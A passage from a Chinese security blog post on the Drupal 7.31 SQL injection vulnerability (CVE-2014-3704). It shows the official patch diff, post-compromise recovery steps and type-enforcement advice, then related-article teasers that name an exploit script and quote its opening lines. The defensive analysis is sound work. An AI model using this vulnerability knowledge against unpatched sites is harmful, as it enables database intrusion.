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" alt="" />

Relevant Link:

https://www.drupal.org/project/drupal

http://php.net/manual/en/function.array-filter.php

http://cn2.php.net/manual/en/function.array-values.php

http://www.91ri.org/11074.html

http://www.freebuf.com/vuls/49148.html

http://www.beebeeto.com/pdb/poc-2014-0100/

5. 防御方法

0x1: 代码修复

.  直接使用官方补丁进行修复:

https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch

、升级到 Drupal 7.32

https://www.drupal.org/drupal-7.32-release-notes

code

diff --git a/includes/database/database.inc b/includes/database/database.inc

index f78098b..01b6385

--- a/includes/database/database.inc

+++ b/includes/database/database.inc

@@ -, +, @@ abstract class DatabaseConnection extends PDO {

     // to expand it out into a comma-delimited set of placeholders.

     foreach (array_filter($args, 'is_array') as $key => $data) {

       $new_keys = array();

-      foreach ($data as $i => $value) {

    /*

    array_values() returns all the values from the array and indexes the array numerically.

    array_values($data)将数组的值单独剥离出来,组成一个数字索引的新数组

    */

+      foreach (array_values($data) as $i => $value) {

         // This assumes that there are no other placeholders that use the same

         // name.  For example, if the array placeholder is defined as :example

         // and there is already an :example_2 placeholder, this will generate

整理后
/includes/database/database.inc

protected function expandArguments(&$query, &$args)

{

    $modified = FALSE;

    foreach (array_filter($args, 'is_array') as $key => $data)

    {

        $new_keys = array();

    //foreach ($data as $i => $value) {

        foreach (array_values($data) as $i => $value)

        {

            $new_keys[$key . '_' . $i] = $value;

        } 

        $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

        unset($args[$key]);

        $args += $new_keys;

        $modified = TRUE;

    }

    return $modified;

}

代码修复的核心思想就是对input array进行了key卸载,将输入值强制限定在了原本程序预设的可接受的值范围中

0x2: 脏数据回滚

对于这种漏洞,除了进行代码级漏洞修复之外,还需要进行脏数据回滚,因为黑客可能利用这个漏洞对目标网站进行SQL注入攻击,污染了数据库,因此要通过backup roll back进行脏数据修复

. Take the website offline by replacing it with a static HTML page

. Notify the server’s administrator emphasizing that other sites or applications hosted on the same server might have been compromised via a backdoor installed by the initial attack

. Consider obtaining a new server, or otherwise remove all the website’s files and database from the server. (Keep a copy safe for later analysis.)

. Restore the website (Drupal files, uploaded files and database) from backups from before  October 

. Update or patch the restored Drupal core code

. Put the restored and patched/updated website back online

. Manually redo any desired changes made to the website since the date of the restored backup

Audit anything merged from the compromised website, such as custom code, configuration, files or other artifacts, to confirm they are correct and have not been tampered with.

Relevant Link:

http://help.aliyun.com/view/11108300_13852287.html

6. 攻防思考

针对这种注入漏洞已经衍生的callback RCE漏洞,最好的防御思路就是"参数化防御",由于PHP这种动态语言本身的特性,导致在代码运行中,本来期望的是整型,结果却被注入了字符并正常执行。安全审计人员应该在一些敏感的函数点执行前对相关的数组、变量进行"强制参数化防御",即将输入的值强制限定在一个可接受的值、可接受的变量类型。这也可以从根本上防御一类变量初始化导致的代码漏洞

Copyright (c) 2014 LittleHann All rights reserved

DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis的更多相关文章

  1. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  2. Drupal 7.31 SQL Injection Exp

    #-*- coding:utf-8 -*- import urllib2,sys import hashlib   # Calculate a non-truncated Drupal 7 compa ...

  3. (25)ASP.NET Core EF查询(复杂查询运算符、原生SQL查询、异步查询)

    1.复杂查询运算符 在生产场景中,我们经常用到LINQ运算符进行查询获取数据,现在我们就来了解下生产场景经常出现几种复杂查询运算符. 1.1联接(INNER JOIN) 借助LINQ Join运算符, ...

  4. SAP-MM:收货转储时提示 M7053“只能在公司代码 **** 的期间 2014/04 和 2014/03 中记账”

    错误信息   消息号M7053   解决方法 Step 1.使用MMPV进入"关闭账期"界面. Step 2.输入"公司代码"."期间".& ...

  5. [SQL Server 2014] 微软将于年底发布新版数据库SQL Server 2014

    在今年的TechEd大会上,微软宣布SQL Server 2014的第一个技术预览版.SQL Server 2014的重点包括内存OLTP.实时的大数据分析.支持混合云端,以及提供更完整的商业智能(B ...

  6. JavaScript基础系列目录(2014.06.01~2014.06.08)

    下列文章,转载请亲注明链接出处,谢谢! 链接地址: http://www.cnblogs.com/ttcc/tag/JavaScript%20%E5%9F%BA%E7%A1%80%E7%9F%A5%E ...

  7. Drupal 7.31 SQL注入漏洞利用具体解释及EXP

     有意迟几天放出来这篇文章以及程序,只是看样子Drupal的这个洞没有引起多少重视,所以我也没有必要按着不发了,只是说实话这个洞威力挺大的.当然.这也是Drupal本身没有意料到的. 0x00 首 ...

  8. Drupal 7.31 SQL注射分析POC

    此漏洞昨日爆发 ,我们有时间去看看今天的代码. 于Drupal于,跑sql声明使用PDO型号,这是一般能够避免大部分的注射,由于使用占位符的sql语法语句是限制. 但是,这并不意味着绝对安全,. 在D ...

  9. ASP.NET Core中的OWASP Top 10 十大风险-SQL注入

    不定时更新翻译系列,此系列更新毫无时间规律,文笔菜翻译菜求各位看官老爷们轻喷,如觉得我翻译有问题请挪步原博客地址 本博文翻译自: https://dotnetcoretutorials.com/201 ...

随机推荐

  1. mysql数据库误删除后的数据恢复操作说明

    在日常运维工作中,对于mysql数据库的备份是至关重要的!数据库对于网站的重要性使得我们对mysql数据的管理不容有失!然后,是人总难免会犯错误,说不定哪天大脑短路了来个误操作把数据库给删除了,怎么办 ...

  2. onmeasure

    UNSPECIFIE : 0 [0x0],未加规定的,表示没有给子view添加任何规定. EXACTLY : 1073741824 [0x40000000],精确的,表示父view为子view确定精确 ...

  3. OpenShift

